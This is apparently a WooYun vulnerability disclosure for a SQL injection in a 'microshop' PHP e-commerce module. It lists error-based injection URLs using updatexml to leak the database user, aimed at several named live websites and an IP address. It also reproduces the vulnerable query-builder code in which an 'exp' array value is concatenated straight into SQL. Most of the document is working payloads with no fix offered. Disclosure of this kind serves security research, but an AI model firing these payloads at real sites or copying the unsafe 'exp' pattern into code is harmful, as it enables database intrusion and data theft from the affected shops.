WooYun.org

http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23

http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23

http://o.oular.com/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23

http://121.42.141.67/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23

http://m.qthtbw.com/modules/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23

public function listOp() {
        $model_class = Model('micro_personal_class');
        $class_list = $model_class->getList(TRUE,NULL,'class_sort asc');
        Tpl::output('class_list',$class_list);
        $condition = array();
        if(isset($_GET['keyword'])) {
            $condition['commend_message'] = array('like','%'.$_GET['keyword'].'%'); 
        }
        if(isset($_GET['class_id'])&&!empty($_GET['class_id'])) {
            $condition['class_id'] = $_GET['class_id'];
        }
        $order = 'microshop_sort asc,commend_time desc';
        if($_GET['order'] == 'hot') {
            $order = 'microshop_sort asc,click_count desc';
        }
        self::get_personal_list($condition,$order);
        Tpl::output('html_title',Language::get('nc_microshop_personal').'-'.Language::get('nc_microshop').'-'.C('site_name'));
		Tpl::showpage('personal_list');
	}

protected function get_personal_list( $condition, $order = "commend_time desc" )
		{
				$model_personal = model( "micro_personal" );
				$page_number = 35;
				$field = "micro_personal.*,member.member_name,member.member_avatar";
				$list = $model_personal->getListWithUserInfo( $condition, $page_number, $order, $field );
				Tpl::output( "show_page", $model_personal->showpage( 2 ) );
				Tpl::output( "list", $list );
		}

public function getListWithUserInfo($condition,$page='',$order='',$field='*',$limit=''){
        $on = 'micro_personal.commend_member_id = member.member_id';
        $result = $this->table('micro_personal,member')->field($field)->join('left')->on($on)->where($condition)->page($page)->order($order)->limit($limit)->select();
        return $result;
	}

protected function parseWhereItem( $key, $val )
		{
				$whereStr = "";
				if ( is_array( $val ) )
				{
						if ( is_string( $val[0] ) )
						{
								if ( preg_match( "/^(EQ|NEQ|GT|EGT|LT|ELT|NOTLIKE|LIKE)\$/i", $val[0] ) )
								{
										$whereStr .= $key." ".$this->comparison[strtolower( $val[0] )]." ".$this->parseValue( $val[1] );
										return $whereStr;
								}
								if ( "exp" == strtolower( $val[0] ) )
								{
										$whereStr .= " (".$key." ".$val[1].") ";
										return $whereStr;
								}
								if ( preg_match( "/IN/i", $val[0] ) )
								{
										if ( isset( $val[2] ) && "exp" == $val[2] )
										{
												$whereStr .= $key." ".strtoupper( $val[0] )." ".$val[1];
												return $whereStr;
										}
										if ( empty( $val[1] ) )
										{
												$whereStr .= $key." ".strtoupper( $val[0] )."('')";
												return $whereStr;
										}
										if ( is_string( $val[1] ) )
										{
												$val[1] = explode( ",", $val[1] );
												$zone = implode( ",", $this->parseValue( $val[1] ) );
												$whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")";
												return $whereStr;
										}
										if ( is_array( $val[1] ) )
										{
												$zone = implode( ",", $this->parseValue( $val[1] ) );
												$whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")";
												return $whereStr;
										}
								}
								else if ( preg_match( "/BETWEEN/i", $val[0] ) )
								{
										$data = is_string( $val[1] ) ? explode( ",", $val[1] ) : $val[1];
										$whereStr .= " (".$key." ".strtoupper( $val[0] )." ".$this->parseValue( $data[0] )." AND ".$this->parseValue( $data[1] )." )";
										return $whereStr;
								}
								else
								{
										$error = "Model Error: args ".$val[0]." is error!";
										throw_exception( $error );
										return $whereStr;
								}
						}
						else
						{
								$count = count( $val );
								if ( in_array( strtoupper( trim( $val[$count - 1] ) ), array( "AND", "OR", "XOR" ) ) )
								{
										$rule = strtoupper( trim( $val[$count - 1] ) );
										$count -= 1;
								}
								else
								{
										$rule = "AND";
								}
								$i = 0;
								for ( ;	$i < $count;	++$i	)
								{
										$data = is_array( $val[$i] ) ? $val[$i][1] : $val[$i];
										if ( "exp" == strtolower( $val[$i][0] ) )
										{
												$whereStr .= "(".$key." ".$data.") ".$rule." ";
										}
										else
										{
												$op = is_array( $val[$i] ) ? $this->comparison[strtolower( $val[$i][0] )] : "=";
												$whereStr .= "(".$key." ".$op." ".$this->parseValue( $data ).") ".$rule." ";
										}
								}
								$whereStr = substr( $whereStr, 0, -4 );
								return $whereStr;
						}
				}
				else
				{
						$whereStr .= $key." = ".$this->parseValue( $val );
				}
				return $whereStr;
		}

index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23